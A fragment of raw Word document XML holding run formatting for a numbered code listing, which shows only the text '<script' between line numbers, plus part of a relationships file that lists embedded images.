          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>205</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="13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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="1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206</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="214" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pP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Micr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	<Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/13.jpeg" />
	<Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/14.jpeg" />
	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/15.jpeg" />
	<Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/16.jpeg" />
	<Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/17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